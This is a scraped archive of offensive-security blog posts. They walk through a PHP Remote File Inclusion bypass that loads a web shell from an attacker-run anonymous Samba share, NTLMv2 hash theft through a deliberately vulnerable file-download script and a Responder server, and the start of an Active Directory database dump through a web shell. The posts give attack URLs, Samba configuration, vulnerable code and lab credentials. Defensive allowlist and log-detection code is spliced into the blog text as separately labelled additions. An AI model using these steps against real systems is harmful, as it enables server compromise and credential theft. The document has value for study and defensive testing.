<code class="text spaces"> </code><code class="text plain">--==[[ Greetz To ]]==--</code></div>
<div class="line number45 index44 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">############################################################################################</code></div>
<div class="line number46 index45 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#zero cool, code breaker ica, root_devil, google_warrior, INX_r0ot, Darkwolf indishell, Baba</code></div>
<div class="line number47 index46 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#Silent poison India, Magnum sniper, ethicalnoob Indishell, Reborn India, L0rd Crus4d3r, cool toad</code></div>
<div class="line number48 index47 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#Hackuin,Alicks,mike waals, Dinelson Amine, cyber gladiator, Cyber Ace, Golden boy INDIA</code></div>
<div class="line number49 index48 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#Ketan Singh, AR AR, saad abbasi, Minhal Mehdi, Raj bhai ji, Hacking queen, lovetherisk, Bikash Dash, D3</code></div>
<div class="line number50 index49 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#############################################################################################</code></div>
<div class="line number51 index50 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text spaces"> </code><code class="text plain">--==[[Love to]]==--</code></div>
<div class="line number52 index51 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#
My Father ,my Ex Teacher, cold fire hacker, Mannu, ViKi,Ashu bhai
ji, Soldier Of God, Bhuppi, Anurag, Cyber Warrior, Vivek Sir</code></div>
<div class="line number53 index52 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#Mohit, Ffe, Ashish, Shardhanand, Budhaoo,Incredible, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)</code></div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
</div>
</div>
</div>
Author: Mannu Linux (http://www.blogger.com/profile/00618753918803236379). Published 2019-05-12, updated 2023-11-22.<br />
Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Pranaam to all _/\_<br />
In this blog post, I am going to demonstrate the technique of exploiting a Remote File Inclusion (RFI) vulnerability in PHP applications that are vulnerable to file inclusion attacks. We will bypass the remote URL inclusion restriction and exploit RFI even if the PHP environment is configured not to include files from remote HTTP/FTP URLs.<br />
<br />
<b><span style="color: red;">PHP and SMB share file access </span></b><br />
In the PHP configuration file, the "allow_url_include" directive is set to "Off" by default, which instructs PHP not to load remote HTTP or FTP URLs and hence prevents Remote File Inclusion attacks. But PHP does not block loading from SMB (UNC) paths even if "allow_url_include" and "allow_url_fopen" are both set to "Off": on Windows, a path of the form \\server\share\file carries no URL scheme and is handled by PHP's plain file wrapper rather than a remote URL wrapper, so the remote URL restrictions never apply to it. This behaviour of PHP can be abused to load a remotely hosted PHP web shell from an SMB share.<br />
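The behaviour just described, as an added example that is not the blog's code: the vulnerable include pattern beside an allowlist version that never turns the request value into a path, so neither an http:// URL nor a UNC share name can be included regardless of the allow_url_include setting. The ./pages directory and its three entries are assumptions.

```php
<?php
// Added example, not the blog's code. Assumption: the templates that "page"
// may select live under the hypothetical directory ./pages.
declare(strict_types=1);

// Vulnerable pattern (the one this post exploits): the request value is the
// include target. allow_url_include=Off makes the http:// wrapper refuse
// "http://attacker/box.php", but "\\192.168.0.3\ica\box.php" carries no URL
// scheme, so on Windows PHP treats it as a plain (UNC) file path and opens it
// over SMB exactly like a local file. On Linux PHP has no built-in SMB support,
// so the same value simply fails to open there.
function includePageVulnerable(string $page): void
{
    include $page;
}

// Hardened pattern: the request value is a key into a fixed map. It is never
// concatenated into a path, so there is nothing for a UNC path, a URL or a
// "../" sequence to influence.
const PAGE_ALLOWLIST = [
    'home'    => __DIR__ . '/pages/home.php',
    'about'   => __DIR__ . '/pages/about.php',
    'contact' => __DIR__ . '/pages/contact.php',
];

function resolvePage(string $page): ?string
{
    return PAGE_ALLOWLIST[$page] ?? null;
}

function includePageHardened(string $page): void
{
    $target = resolvePage($page);
    if ($target === null) {
        error_log('include refused for page=' . $page);   // e.g. \\192.168.0.3\ica\box.php
        http_response_code(404);
        return;
    }
    include $target;
}

// Detection helper, independent of the include code: a request value that starts
// with a UNC prefix, a protocol-relative "//" or a scheme/drive prefix ("http:",
// "c:") is a clear indicator of this attack and worth alerting on in access logs.
function looksRemote(string $value): bool
{
    return strncmp($value, '\\\\', 2) === 0
        || strncmp($value, '//', 2) === 0
        || preg_match('~^[a-z][a-z0-9+.-]*:~i', $value) === 1;
}

includePageHardened((string) ($_GET['page'] ?? 'home'));
```

With the allowlist in place the php.ini settings become defence in depth rather than the only control, which is the point of this post: allow_url_include was never designed to cover paths that PHP considers local.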
<br />
<b><span style="color: red;">Attack scenario outline</span></b><br />
When the vulnerable PHP application code tries to load the PHP web shell from an attacker-controlled SMB share, the SMB share must allow access to the file. The attacker needs to configure the SMB server with anonymous browsing access enabled. Then, once the vulnerable application tries to access the PHP web shell from the SMB share, the SMB server will not ask for any credentials and the PHP code of the web shell will be included by the vulnerable application. <br />
<br />
Let's start. First of all, I reconfigured the PHP environment and disabled "allow_url_fopen" as well as "allow_url_include" in the php.ini file. Later I configured an SMB server with anonymous read access. Once the SMB share is ready, exploit the vulnerable application. <br />
<br />
<b><span style="color: red;">PHP environment settings</span></b><br />
The machine hosting the vulnerable code has "allow_url_fopen" and "allow_url_include" set to "Off".<br />
Screenshot of the current configuration of PHP version "5.5.11":<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7t4Hs7BDFvhwHpPrBYxdGFlCed0_sUot8e-CLN1uAhStdIpA1ADSGGS3r5GM4YnzsDugfCNBtHiIhrirt3T9U8xZhHsHIybVBr0dkZkh4qQI050zHCpRt7RMGs8gNkxWwVfdrr0t_iXo/s1600/phpinfo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="389" data-original-width="1181" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7t4Hs7BDFvhwHpPrBYxdGFlCed0_sUot8e-CLN1uAhStdIpA1ADSGGS3r5GM4YnzsDugfCNBtHiIhrirt3T9U8xZhHsHIybVBr0dkZkh4qQI050zHCpRt7RMGs8gNkxWwVfdrr0t_iXo/s1600/phpinfo.png" /></a></div>
<br />
Before proceeding, let's make sure the PHP code does not allow Remote File Inclusion when we try to access a web shell hosted over HTTP.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhROls7uW4a41ujDJ0SbaQVsduEQxaE9tCFVq8OK1tuAXbebUwQZk2L5-bxmBUvT4Mqp3-oBbpc6-51JiPiKj525PlFJNLjsuSV6VFC-_i1HwQwPu4byxz-wCA9skuhWo_JnGQ_ojdvUAA/s1600/rfi_check.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="308" data-original-width="1494" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhROls7uW4a41ujDJ0SbaQVsduEQxaE9tCFVq8OK1tuAXbebUwQZk2L5-bxmBUvT4Mqp3-oBbpc6-51JiPiKj525PlFJNLjsuSV6VFC-_i1HwQwPu4byxz-wCA9skuhWo_JnGQ_ojdvUAA/s1600/rfi_check.png" /></a></div>
<br />
The application threw an error and RFI did not happen when I tried to include the PHP web shell from the remote host.<br />
<br />
<b><span style="color: red;">Configuring the Samba server with anonymous read access (Linux machine)</span></b><br />
Install the Samba server using the command below:<br />
<br />
<textarea cols="30" rows="1" style="text-align: center;"> apt-get install samba</textarea><br />
<br />
Create the SMB share directory (in my case /var/www/html/pub/)<br />
<br />
<textarea cols="30" rows="1" style="text-align: center;"> mkdir /var/www/html/pub/ </textarea>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXlcwBda0DeEq_0h1iAtwccm6F9mudGPocNYuPol1kliDMIONX5tszs3ZUjYdd9LFkdzgSi64e7ga-Y-8RBrSyDJNUCiSKyKLtZoquxKZCmEHU_8eRs7vdOnVBsEyHCsuFfT2UJHDLVjs/s1600/rfi_mkdir.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="172" data-original-width="599" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXlcwBda0DeEq_0h1iAtwccm6F9mudGPocNYuPol1kliDMIONX5tszs3ZUjYdd9LFkdzgSi64e7ga-Y-8RBrSyDJNUCiSKyKLtZoquxKZCmEHU_8eRs7vdOnVBsEyHCsuFfT2UJHDLVjs/s1600/rfi_mkdir.png" /></a></div>
<br />
Configure permissions on the newly created SMB share directory:<br />
<br />
<textarea cols="45" rows="2" style="height: 41px; margin: 0px; width: 397px;">chmod 0555 /var/www/html/pub/
chown -R nobody:nogroup /var/www/html/pub/</textarea>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-GdgprJpLdqmCoIbfxWMgDdG-fWDRAebfv6PC3fndKZs8jTpVB1NcynyRjN82W0Evj_xCuCujlvrqh5rzABAQOiPEQvnHjtn0xbB5yLXzjiEmHWFXB8wqlg8AeohA7DYMmtHrN_pvyC4/s1600/rfi_permissions.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="252" data-original-width="749" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-GdgprJpLdqmCoIbfxWMgDdG-fWDRAebfv6PC3fndKZs8jTpVB1NcynyRjN82W0Evj_xCuCujlvrqh5rzABAQOiPEQvnHjtn0xbB5yLXzjiEmHWFXB8wqlg8AeohA7DYMmtHrN_pvyC4/s1600/rfi_permissions.png" /></a></div>
<br />
Run the command below to remove the default content of the Samba server config file:<br />
<br />
<textarea cols="30" rows="1" style="text-align: center;"> echo > /etc/samba/smb.conf</textarea>
<br />
<br />
Put the content below in the file '/etc/samba/smb.conf':
<br />
<br />
<textarea cols="35" rows="20">
[global]
workgroup = WORKGROUP
server string = Samba Server %v
netbios name = indishell-lab
security = user
map to guest = bad user
name resolve order = bcast host
dns proxy = no
bind interfaces only = yes
[ica]
path = /var/www/html/pub
writable = no
guest ok = yes
guest only = yes
read only = yes
directory mode = 0555
force user = nobody
</textarea>
<br />
<br />
Now, restart the Samba server to apply the new configuration specified in the config file /etc/samba/smb.conf:
<br />
<br />
<textarea cols="30" rows="1" style="text-align: center;"> service smbd restart </textarea>
<br />
<br />
Once the Samba server has restarted successfully, try to access the SMB share and make sure the Samba server is not asking for credentials.<br />
In my case, the Samba server IP is 192.168.0.3, so I access the SMB share in Windows File Explorer as shown below:<br />
<br />
<textarea cols="18" rows="1" style="text-align: center;"> \\192.168.0.3\</textarea><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqEz50bzikcWDZYcVHtVbGS4iAgH29xqhO_4wkmuc1YusdAEQhE-wbg6qukEHN5M3BVA0eN6A2Sa-w-aiBYf_20dPakzgleMqiws9yYipMaisdostX6WSvpsdTE9AK-bA3hHjMxOK2Ju8/s1600/rfi_smb1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="194" data-original-width="566" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqEz50bzikcWDZYcVHtVbGS4iAgH29xqhO_4wkmuc1YusdAEQhE-wbg6qukEHN5M3BVA0eN6A2Sa-w-aiBYf_20dPakzgleMqiws9yYipMaisdostX6WSvpsdTE9AK-bA3hHjMxOK2Ju8/s1600/rfi_smb1.png" /></a></div>
<br />
<b><span style="color: red;">Hosting PHP web shell in SMB share</span></b><br />
Awesome, the SMB share is accessible and shows that the directory 'ica' is present.<br />
Now, host the PHP shell in the directory '/var/www/html/pub', which is the directory backing the SMB share 'ica'.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrBgdalhPgqDmsWRMX1X14DaE03nXIvnuQ-jrxevI7kuDYuFWVk3s8x8CTOUdWeEUjWR_OFHPiCu23pqNdh13XEckDMuJ-b9pZ4JqvlvZn89O4C3og4BX0hcqX_NAcVO_yYHrKFLe565o/s1600/rfi_download.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="423" data-original-width="1504" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrBgdalhPgqDmsWRMX1X14DaE03nXIvnuQ-jrxevI7kuDYuFWVk3s8x8CTOUdWeEUjWR_OFHPiCu23pqNdh13XEckDMuJ-b9pZ4JqvlvZn89O4C3og4BX0hcqX_NAcVO_yYHrKFLe565o/s1600/rfi_download.png" /></a></div>
<br />
<br />
Once we have the PHP shell in the directory '/var/www/html/pub', access the SMB share directory 'ica' using Windows File Explorer.<br />
<br />
<textarea cols="20" rows="1" style="text-align: center;"> \\192.168.0.3\ica\</textarea><br />
<br />
You will see the PHP shell is present in the SMB share directory. In my case it is box.php<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZJPQsSZy3DzvmcyML1CUsdBXzrW8v9Q22ZKmadvWiLyaSC5PcwPldVBuEoISBohnXJy8fom45rTRl1kqEz-WJf64UvwOjWIs7BXHU1_hrED6akImJK1JstshMktpCSY-ubkRXCzP5htw/s1600/rfi_smb2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="180" data-original-width="657" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZJPQsSZy3DzvmcyML1CUsdBXzrW8v9Q22ZKmadvWiLyaSC5PcwPldVBuEoISBohnXJy8fom45rTRl1kqEz-WJf64UvwOjWIs7BXHU1_hrED6akImJK1JstshMktpCSY-ubkRXCzP5htw/s1600/rfi_smb2.png" /></a></div>
<br />
<br />
<b><span style="color: red;">Attacking the File Inclusion vulnerable parameter</span></b><br />
Perfect, let's use the SMB link to this PHP shell and browse it through the vulnerable PHP code.<br />
<br />
<textarea cols="75" rows="2" style="text-align: center;"> http://vulnerable_application/page.php?page=\\192.168.0.3\ica\box.php
</textarea><br />
<br />
Dang Dang! The vulnerable PHP code fetched the web shell from the SMB share and executed the code \m/ on the application server. We have bypassed the restriction and included the web shell hosted on a remote host.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDW1hf7bIocQPYwNIVaZ1u12uHzcoQ7m6K6K4phSbh-pCbHhKmbhwKNHfEHVNICnZcxoTbwum4blHkfCWat8pncGTKQpRptzF6M3sjUTS0umgSGROPjpFV9FX087pBiJDgX2ldf96S65w/s1600/rfi_shell.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="766" data-original-width="1243" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDW1hf7bIocQPYwNIVaZ1u12uHzcoQ7m6K6K4phSbh-pCbHhKmbhwKNHfEHVNICnZcxoTbwum4blHkfCWat8pncGTKQpRptzF6M3sjUTS0umgSGROPjpFV9FX087pBiJDgX2ldf96S65w/s1600/rfi_shell.png" /></a></div>
<br />
<br />
<div>
<br />
<div class="line number52 index51 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain"># My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi, Anurag, Cyber Warrior</code></div>
<div class="line number53 index52 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)</code></div>
</div>
</div>
Mannu Linux http://www.blogger.com/profile/00618753918803236379 noreply@blogger.com 0 tag:blogger.com,1999:blog-6893238704654067208.post-6401049422598662144 2018-12-16T01:07:00.000+05:30 2019-05-18T22:41:57.286+05:30 How to steal NTLMv2 hashes using file download vulnerability in web application <div dir="ltr" style="text-align: left;" trbidi="on">
Hello All,<br />
<br />
This blog post is a demonstration of "Abuse of a file download vulnerability to steal NTLMv2 hashes".<br />
In this scenario, the web application is hosted on a machine which is part of a Windows Active Directory domain, and it allows users to download a file without checking its path.<br />
<br />
An attacker can take advantage of the file download vulnerability to trigger a request to an attacker-controlled server on which the "Responder" tool is running, and steal the NTLMv2 hash from the server. Responder's "SMB auth server" forces the target server to hand over the NTLMv2 hash; that hash can later be used to:<br />
1. perform a relay against any Windows machine having "SMB Signing Disabled", or<br />
2. try to crack it using hash cracking tools like Hashcat<br />
<br />
Let's start with the web application which has the file download vulnerability and can be made to issue an SMB request to download a file from a remote host.<br />
The vulnerable PHP script is<br />
<br />
http://192.168.56.200:8080/file.php?file=any_file.txt<br />
<br />
and PHP code is <br />
<br />
<textarea cols="100" rows="38"><?php
// Vulnerable on purpose: $download is used exactly as received from the client.
function file_download($download)
{
// file_exists() accepts relative, absolute and (on Windows) UNC paths such as \\host\share\file
if(file_exists($download))
{
header("Content-Description: File Transfer");
header('Content-Transfer-Encoding: binary');
header('Expires: 0');
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Pragma: public');
header('Accept-Ranges: bytes');
header('Content-Disposition: attachment; filename="'.basename($download).'"');
header('Content-Length: ' . filesize($download));
header('Content-Type: application/octet-stream');
ob_clean();
flush();
readfile ($download);
}
else
{
echo "<script>alert('file not found');</script>";
}
}
// No path validation: whatever the "file" parameter contains is passed straight through
$file_name=trim($_GET['file']);
file_download($file_name);
?>
</textarea>
<br />
<br />
The PHP script will perform the file download if we specify any file and it exists on the system.<br />
The script accepts relative as well as full paths, so we will take advantage of this behavior and make an SMB request to the server on which the Responder tool is running.<br />
<br />
Let's assume the actual request which allows a user to download a file is<br />
<br />
http://192.168.56.200:8080/file.php?file=box.html<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdCJnwjTdmV_aZoIiMzxm4ssW8f9r4hVpAuhMFYoORpcACckxvXWxIoTmJM8ZeDCCqCzKGBCnWLGwODGcthOVPM9m_pf15lggHY3SpiTydmBbPjyFLAtp4MHiqd3tB0qST8pyrA2BJmd4/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="502" data-original-width="763" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdCJnwjTdmV_aZoIiMzxm4ssW8f9r4hVpAuhMFYoORpcACckxvXWxIoTmJM8ZeDCCqCzKGBCnWLGwODGcthOVPM9m_pf15lggHY3SpiTydmBbPjyFLAtp4MHiqd3tB0qST8pyrA2BJmd4/s1600/1.png" /></a></div>
<br />
<br />
My server where Responder is running has the IP 192.168.56.102<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilafmB5_HLC9EmSfLKhU5Ary3ad6pVq2mkSBSXB-ia0dbGYuS0QWlhZecru5wJ1zfpNQix4Ce3RqUD3sP4vtJU76iCMOWbY_jvT6S8I6Oo1UgT34YRrDbNsA67u1FieECjII-YS464dDU/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="746" data-original-width="1055" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilafmB5_HLC9EmSfLKhU5Ary3ad6pVq2mkSBSXB-ia0dbGYuS0QWlhZecru5wJ1zfpNQix4Ce3RqUD3sP4vtJU76iCMOWbY_jvT6S8I6Oo1UgT34YRrDbNsA67u1FieECjII-YS464dDU/s1600/2.png" /></a></div>
<br />
Now, make an SMB request to Responder using the vulnerable parameter; it should look like<br />
<br />
http://target_web_server/vulnerable_script.php?parameter=\\Responder_server_IP\any_file.txt<br />
<br />
Here, target_web_server is 192.168.56.200:8080,<br />
vulnerable_script.php is file.php with the parameter "file", and Responder_server_IP is 192.168.56.102.<br />
The final URL is<br />
http://192.168.56.200:8080/file.php?file=\\192.168.56.102\box.html<br />
<br />
If everything goes fine, Responder will capture the NTLMv2 hash of the target server.<br />
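The checks a defender would put in front of a script like this, as an added example that is not part of the original post: the validation mirrors what the vulnerable PHP above omits (a bare filename is required, so UNC, drive-absolute and traversal values are refused before any filesystem call is made), and the same classifier is then run over a few constructed access-log lines to surface requests of the shape shown in this post and in the RFI post above it. The function names, the base directory argument and the log lines are assumptions for illustration; the code is Python rather than PHP so it can be run stand-alone.<br />

```python
"""Server-side validation for a download-by-filename parameter, plus a log check.

Added example, not the blog's PHP script: the function names, the base
directory and the access-log lines below are constructed for illustration.
"""
import os
import re
from urllib.parse import parse_qsl, urlsplit

_DRIVE_PREFIX = re.compile(r"^[A-Za-z]:")
# Reasons that indicate an attempt to leave the download directory.
REJECT_REASONS = ("unc", "absolute", "traversal", "nul")


def classify_download_path(value: str) -> str:
    """Return 'ok' for a bare filename, otherwise the reason it is rejected."""
    value = value.strip()
    if not value:
        return "empty"
    if "\0" in value:
        return "nul"
    if value.startswith(("\\\\", "//")):
        # \\host\share (or //host/share): on Windows, PHP's file_exists() opens an
        # SMB session to 'host' and authenticates as the web server's user.
        return "unc"
    if value.startswith(("/", "\\")) or _DRIVE_PREFIX.match(value):
        return "absolute"
    if "/" in value or "\\" in value or value in (".", ".."):
        return "traversal"
    return "ok"


def resolve_inside(base_dir: str, value: str):
    """Return the real path of the file to serve, or None when it must not be served.

    The string check rejects the obvious shapes; the realpath comparison
    additionally stops a symlink inside base_dir from escaping it.
    """
    if classify_download_path(value) != "ok":
        return None
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, value))
    if os.path.dirname(target) != base or not os.path.isfile(target):
        return None
    return target


# Combined-format access-log line; only the fields used here are captured.
_ACCESS_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log (not from the blog); 192.0.2.10 is a documentation address.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [16/Dec/2018:01:07:11 +0530] "GET /file.php?file=box.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [16/Dec/2018:01:08:02 +0530] "GET /file.php?file=%5C%5C192.0.2.10%5Cbox.html HTTP/1.1" 200 0 "-" "curl/7.61.0"',
    '10.0.0.9 - - [16/Dec/2018:01:08:30 +0530] "GET /page.php?page=//192.0.2.10/share/box.php HTTP/1.1" 500 0 "-" "curl/7.61.0"',
    '10.0.0.7 - - [16/Dec/2018:01:09:00 +0530] "GET /file.php?file=..%2F..%2Fconfig.php HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]


def find_suspicious_requests(lines):
    """Return (client_ip, url, parameter, decoded_value, reason) for each rejected value."""
    hits = []
    for line in lines:
        m = _ACCESS_LINE.match(line)
        if not m:
            continue
        url = m.group("url")
        # parse_qsl percent-decodes, so %5C%5C and %2F are seen as \\ and /.
        for key, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
            reason = classify_download_path(value)
            if reason in REJECT_REASONS:
                hits.append((m.group("ip"), url, key, value, reason))
    return hits


if __name__ == "__main__":
    for hit in find_suspicious_requests(SAMPLE_ACCESS_LOG):
        print(hit)
```

The classifier runs on every query parameter rather than only on "file", because the same UNC value works against any parameter that ends up in a filesystem call (the RFI post's "page" parameter included). Keying the download on an allow-listed directory plus a bare filename, as resolve_inside does, removes the outbound SMB authentication entirely, which is the control that matters here; the log check is the compensating detection for servers that cannot be patched immediately.<br />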
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlK3QUDbxX_PvUNkf8DxarTLt6AkhHFi4skkiu5KrBbir2cQEDjn-DETvTleH7FaCK8B_Vm1Mo32oXOmtGn469Zg1woBh2_kf6UaO6NYoGmtJxX5NB4TQki3D_dIJ7PsJ0S8Px-C3Gv-M/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="621" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlK3QUDbxX_PvUNkf8DxarTLt6AkhHFi4skkiu5KrBbir2cQEDjn-DETvTleH7FaCK8B_Vm1Mo32oXOmtGn469Zg1woBh2_kf6UaO6NYoGmtJxX5NB4TQki3D_dIJ7PsJ0S8Px-C3Gv-M/s1600/3.png" /></a></div>
<br />
The above screenshot shows that Responder captured the hash from the target server, and that the target web server is running with the privileges of the Windows Active Directory user with username "user3".<br />
<br />
Now, one can try to crack this captured hash to get the plain-text password. "Hashcat" is an awesome tool for fast hash cracking: it supports CPU/GPU cracking and many hash formats. The official Hashcat download site is https://hashcat.net/hashcat/. Download a good password dictionary (here is one: https://hashkiller.co.uk/downloads.aspx), run hashcat and wait, hoping luck is on our side. <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGm997BPhbwjMWFVeiyiD6w9l3OhtAauNYQahpeKMHxakEAGYq4rXb38U929lswczUliOqTUUpN4cg5mgQgRIDLqbX3o89_WnNFgC8ty2I25uQV97hHdX4LSKytaeGvH9PMLLj0YGTO30/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="602" data-original-width="1553" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGm997BPhbwjMWFVeiyiD6w9l3OhtAauNYQahpeKMHxakEAGYq4rXb38U929lswczUliOqTUUpN4cg5mgQgRIDLqbX3o89_WnNFgC8ty2I25uQV97hHdX4LSKytaeGvH9PMLLj0YGTO30/s1600/4.png" /></a></div>
<br />
<br />
Hashcat got the plain-text password of the NTLMv2 hash captured by Responder.<br />
Now we can play around in the Windows Active Directory a little bit more, as we have the credentials of one Domain User. <br />
That's all from my side.<br />
<br />
Thanks for reading.<br />
<br />
Special thanks to <a href="https://twitter.com/PyroTek3" target="_blank">Sean Metcalf</a>, <a href="https://twitter.com/TheColonial" target="_blank">OJ</a>, <a href="https://twitter.com/vysecurity" target="_blank">Vincent Yiu</a>, <a href="https://twitter.com/_wald0" target="_blank">Andrew Robbins</a>, <a href="https://twitter.com/harmj0y" target="_blank">will</a>,
<a href="https://twitter.com/gentilkiwi" target="_blank">Benjamin Delpy</a>, <a href="https://twitter.com/byt3bl33d3r" target="_blank">Marcello</a>, <a href="https://twitter.com/vanderaj" target="_blank">Andrew van der Stock</a>, <a href="https://twitter.com/g0tmi1k" target="_blank">g0tmi1k</a>, <a href="https://twitter.com/pwntester" target="_blank">Alvaro Muñoz</a>, <a href="https://twitter.com/FuzzySec" target="_blank">b33f</a>, <a href="https://twitter.com/trufae" target="_blank">pancake</a>, <a href="https://twitter.com/m3g9tr0n" target="_blank">m3g9tr0n</a>, <a href="https://twitter.com/hexachordanu" target="_blank">Anurag Srivastava</a>, <a href="https://twitter.com/be_vvk" target="_blank">vivek chauhan</a>, <a href="https://twitter.com/Pwsecspirit" target="_blank">Spirited wolf</a>
<br />
<br />
<br />
<br /></div>
Mannu Linux http://www.blogger.com/profile/00618753918803236379 noreply@blogger.com 0 tag:blogger.com,1999:blog-6893238704654067208.post-2228928140266667192 2018-12-06T00:55:00.001+05:30 2019-05-24T17:04:10.172+05:30 Remotely dump "Active Directory Domain Controller" machine user database using web shell<div dir="ltr" style="text-align: left;" trbidi="on">
Hello All,<br />
<br />
This time I want to share something related to the "Windows Active Directory (AD)" environment.<br />
I am gonna demonstrate "How to dump the Windows Active Directory user database" just using a web shell.<br />
There may be a case, during a pentest, where the pentester got the "Domain Admin" user credentials and web shell access on one of the machines connected to the Windows Active Directory forest. The pentester is trying to get a reverse shell and for some reason is not getting it (let's say the network firewall is not allowing it), but the pentest goal is to dump the AD user database, i.e. the users and NTLM password hashes of the AD environment.<br />
I also faced the same issue during a pentest (was not having a server with a public IP :P). After playing around with this issue a little bit, I got a way which is helpful to achieve the above mentioned goal just using a web shell, if we have "AD Domain Admin" user credentials.<br />
Here, the assumptions are as follows:<br />
<br />
1. AD Domain Controller machine (queen.DC1.indishell.lab - 192.168.56.200)<br />
2. Compromised windows machine - connected to AD (LABONE - 192.168.56.101)<br />
3. Managed to get a Windows AD Domain Admin user (using any exploit; in my case I got the Domain Admin user password using the legendary "<i><b>MS14-025</b></i>" exploit)<br />
<br />
Now, I have web shell access on a Windows machine which is connected to the domain, i.e. "LABONE", and its IP is "192.168.56.101". I got a Domain Admin with the user name "user1", and its password is "ica_1046".<br />
<br />
In this case, I will be using 2 binaries:<br />
1. psexec.exe <- Windows Sysinternals tool<br />
2. vssadmin <- command to create/delete volume shadow copies of a Windows drive.<br />
<br />
